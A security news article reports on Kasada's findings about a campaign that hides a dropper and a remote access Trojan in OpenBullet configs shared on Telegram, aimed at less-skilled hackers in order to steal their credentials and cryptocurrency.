Attackers Targeting Inexperienced Hackers With New Malware Campaign
Even as they run malware attacks against targets that live outside of the cybercriminal ecosystem, it’s not unusual for more experienced hackers to turn their focus on their less-skilled brethren. A new campaign is putting that tendency into sharp focus.
In the campaign detected by researchers at bot management vendor Kasada, unknown bad actors are leveraging the OpenBullet software testing suite to install a remote access Trojan (RAT) onto the systems of so-called “script kiddies,” with the apparent goal of stealing their data and cryptocurrency.
Members of Kasada’s Threat Intelligence Team wrote in a report that the campaign caught their attention “due to the novel infection vector and the exploitation of the sense of trust the members of these criminal communities have for one another.”
“Sophisticated threat actors have a reputation for preying on beginner hackers, known as ‘script kiddies’ who rely on pre-existing scripts and tools,” the Kasada team wrote. “A typical scenario occurs when more knowledgeable threat actors bundle malicious code into their tools and share them within a community.”
The younger – and much less experienced – hackers will blindly run these tools and inadvertently infect their computers.
Leveraging OpenBullet
In this case, it was when script kiddies downloaded OpenBullet configurations from a Telegram channel that included a function designed to bypass Google’s reCAPTCHA anti-bot tool. OpenBullet is a legitimate offering that is found on GitHub and is used by organizations for such tasks as data scraping and parsing and automated penetration testing, according to bot management software vendor Netacea.
“Unfortunately, OpenBullet’s open-source nature and low barrier to entry have resulted in it being the tool of choice for malicious actors looking to automate credential stuffing and account takeover (ATO) attacks,” the Kasada researchers wrote.
OpenBullet uses configuration files to test the security of websites and web applications, but in the hands of attackers, they can be used to target these sites and applications while getting around CAPTCHAs and other security measures.
Configs show OpenBullet how to generate HTTP requests against targets, run browser commands, grab data from accounts that have been taken over and run sophisticated attacks. They can be complex, with some made up of hundreds of lines of code.
They also can be sold or traded to other cybercriminals on hacking forums to run their own credential stuff–where the bad actor gets access to a protected account using compromised credentials–or brute-force attacks. While OpenBullet configs can enable complex attacks, inexperienced hackers may not fully grasp what requests are being created or the data that is being taken.
“The creators of this particular malicious campaign are taking advantage of this, utilizing variables and randomly-ordered functions to confuse the victim and obfuscate the true nature of the config,” the researchers wrote.
Keep Hold of Your Cryptowallets
The malicious configs discovered by Kasada carry two payloads that are stored on a GitHub repository. The first, dubbed Ocean, is a dropper payload built using the Rust programming language and with the sole purpose of dropping the second payload, called Patent. It’s a Python-based malware that launches the RAT and communicates with the campaign operators over Telegram, using the encrypted messaging app as its command-and-control (C2) mechanism. Among its jobs is to take screenshots, list contents in the directory, kill tasks and identify and decrypt stored logins and cookies from several Chromium browsers.
It also searches for cryptowallets and steals cryptocurrencies such as Bitcoin, Ethereum and Dogecoin and operates as a clipper, allowing it to eventually run unauthorized fund transfers from the cryptowallets to other wallet addresses controlled by the hackers.
According to Kasada, as of earlier this month, the attackers seem to have stolen $1.703 worth of Bitcoin and $2,107 of the other coins.
“The distribution of the malicious OpenBullet configs within Telegram is a novel infection vector, likely targeting these criminal communities due to their frequent use of cryptocurrencies,” the researchers wrote. “Members within these communities regularly use cryptocurrency to buy tools, configs, and stolen credentials from each other.
“As the old saying goes, there is no honour amongst thieves,” the researchers said.
While the campaign is targeting other hackers, non-criminal organizations could be affected by the malware, and threat intelligence experts and security vendors could get bitten by it if they don’t first check and remote malicious function calls within their OpenBullet configs, they wrote.
